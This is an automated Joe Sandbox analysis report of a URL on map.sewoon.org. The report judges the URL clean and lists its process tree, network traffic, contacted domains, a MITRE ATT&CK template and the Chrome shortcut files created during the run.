Edit tour

Windows Analysis Report
https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es

Overview

General Information

Sample URL:	https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es
Analysis ID:	1430589
Infos:

Detection

Score:	1
Range:	0 - 100
Whitelisted:	false
Confidence:	80%

Signatures

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2524,i,8810008252200331664,4950474345356171271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es

Sample URL: PII: alpanesgmj@madrid.es

Source: https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es

HTTP Parser: No favicon

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49721 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.5:49717 version: TLS 1.2

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49721 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /1/themes/es/?cid=alpanesgmj@madrid.es HTTP/1.1Host: map.sewoon.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: map.sewoon.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.esAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2021/08/cropped-favicon-32x32.png HTTP/1.1Host: map.sewoon.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.esAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2021/08/cropped-favicon-32x32.png HTTP/1.1Host: map.sewoon.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: map.sewoon.org

Source: unknown

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1713905737943&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 20:55:57 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.1.1nX-Powered-By: PHP/7.4.21Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.5:49717 version: TLS 1.2

Source: classification engine

Classification label: clean1.win@16/11@6/4

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2524,i,8810008252200331664,4950474345356171271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2524,i,8810008252200331664,4950474345356171271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label	Link
https://map.sewoon.org/wp-content/uploads/2021/08/cropped-favicon-32x32.png	0%	Avira URL Cloud	safe
https://map.sewoon.org/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com	3.38.76.70	true	false	high
www.google.com	64.233.185.99	true	false	high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown
map.sewoon.org	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es	false		unknown
https://map.sewoon.org/wp-content/uploads/2021/08/cropped-favicon-32x32.png	false	Avira URL Cloud: safe	unknown
https://map.sewoon.org/favicon.ico	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
64.233.185.99	www.google.com	United States	15169	GOOGLEUS	false
3.38.76.70	ec2-3-38-76-70.ap-northeast-2.compute.amazonaws.com	United States	8987	AMAZONEXPANSIONGB	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430589
Start date and time:	2024-04-23 22:55:02 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	CLEAN
Classification:	clean1.win@16/11@6/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 64.233.185.94, 142.250.9.101, 142.250.9.139, 142.250.9.100, 142.250.9.102, 142.250.9.138, 142.250.9.113, 142.251.15.84, 34.104.35.123, 52.165.165.26, 192.229.211.108, 96.7.225.19, 96.7.225.11, 96.7.225.65, 52.165.164.15, 23.45.13.195, 23.45.13.184, 23.45.13.171, 13.85.23.86, 142.250.105.94, 40.127.169.103, 72.21.81.240
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 19:55:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9848734411772453
Encrypted:	false
SSDEEP:	48:8OXdLTT/WHmidAKZdA19ehwiZUklqehyy+3:8O9Prhy
MD5:	0B21C64F737BA475ADA7368CC2DFFD50
SHA1:	B5E7B2C17994B4F8D930DE0ED9A9C11628AC8A5C
SHA-256:	4D678E571F45B8974E4A10ACC47EA3537741006F8A951A4C5F56E3687E326244
SHA-512:	778F90C9BEA728D810BE50474F74157CB48F044161B50CC810C3B631169DCE9102D34CFE8FFEA2B3C1D5BD190A4382649DFEF7AC672153B12365E717E04769B4
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....U......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V.Am.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 19:55:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9998555284172843
Encrypted:	false
SSDEEP:	48:8HKdLTT/WHmidAKZdA1weh/iZUkAQkqehRy+2:8HGPZ9QMy
MD5:	8560FBDE13EB6215814FB7455EB68D2B
SHA1:	0548131499547828B8C8DCE6D735D919CF7016A4
SHA-256:	2AC7D110C3F0EF911292AB1B188C8194DFC2AE052D59B8120A1BE56A70E4F4DB
SHA-512:	B2E6D464AE8939F3011DEA956860BF9533075C49BF1BC3290C3CFFD7FC12CFCBACE7A0010EDA49E9E3E610726845884E47AB2248395040663EB69EDBBC7339BB
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......z.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V.Am.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.008684692585281
Encrypted:	false
SSDEEP:	48:8xwdLTT/sHmidAKZdA14tseh7sFiZUkmgqeh7szy+BX:8xsPLn9y
MD5:	1629633FB6AB1EA7913168FC13A55C20
SHA1:	0227DBF10ED26FA3E7A3F9DD19441BA90652F183
SHA-256:	D1CDDEE7B35934C361A6055F3A4682377B19EBCD7CA1CB2990F43A8909041143
SHA-512:	680BBFD2B06638568576FAB5E86D8B16C073ACD670FE50CE84939F894869D0F6228CEA051DC69CDFF8CDB7C3C8F044532875CF0797B55C0048FB725524623F3E
Malicious:	false
Reputation:	low
